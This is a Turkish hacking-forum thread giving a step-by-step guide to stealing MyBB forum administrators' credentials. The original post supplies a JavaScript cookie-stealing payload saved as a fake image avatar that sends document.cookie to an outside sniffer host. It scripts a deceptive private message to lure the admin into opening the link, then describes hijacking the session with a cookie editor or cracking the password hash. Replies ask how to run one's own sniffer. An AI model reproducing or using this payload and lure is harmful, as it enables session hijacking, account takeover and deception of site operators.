MyBB FORUMLARI ADMİN SİFRESİNİ CALMAK

BY_CRAB

Katılımcı Üye
24 Eyl 2006
382
1
ADSL
Evet Şimdi MyBB forumlardaki uplout açığı sayesinde forumdaki yöneticilerin şifrelerini çalmayaı anlatacağım.



>İlk başta bir not defteri açıyoruz ve aşağıdaki verdiğim kodları için yazıyoruz farklı kaydet diyip ''.jpg veyada .gif'' şeklinde yani resim formatında kaydedeceğiz.



kod : **********img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>


Daha sonra siteye üye olup avatar bölümünden göz at diyip resmimizi göz at diyip yüklüyoruz.

Resmimiz forumlarda gözükmeyecektir.Sağ Tıklayıp Özelliklerden Resmin URL sini yani adresini seçip kopyalıyoruz.

Sonra admine özel mesaj gönderiyoruz ve şu tarz bir bilgi yazıyoruz:

'' Ya kardeş benim Her Tarafta kullandığım çok sevdiğim bir avatarım var ama senin sitende görükmüyor sorun nedir acaba avatarın linkini verdim aşağıda diyoruz. ve avatarın linkini koyuyoruz.''

admin linke tıkladığı zaman admin cookie* hash* userid falan hepsi buraya geliyor
http://antichat.ru/sniff/log.php

Bilgiler geldikten sonra http://www.cookieeditor.com/ giderek cookie editörü indiriyoruz. ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash'ı ile www.milw0rm.com 'dan kırdıktan sonra adamın nick'i ve şifresi ile online oluyoruz.. olay bu kadar basit

 

Dr.Deadly

Yeni üye
13 Kas 2006
15
0
yaw anlatmışken kendi snifferimizi kurmayıda oğretseydin kendi sitemizde koyar kendimiz yararlanırdık neyse paylaşım için sağolasın ;)
 

PureHate

Yeni üye
31 Ara 2006
3
0
Dosya yükleme işlemi başarısız. Lütfen geçerli bir dosya seçerek tekrar deneyiniz.

hatasi verio yardimci olursan sevinirmm
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.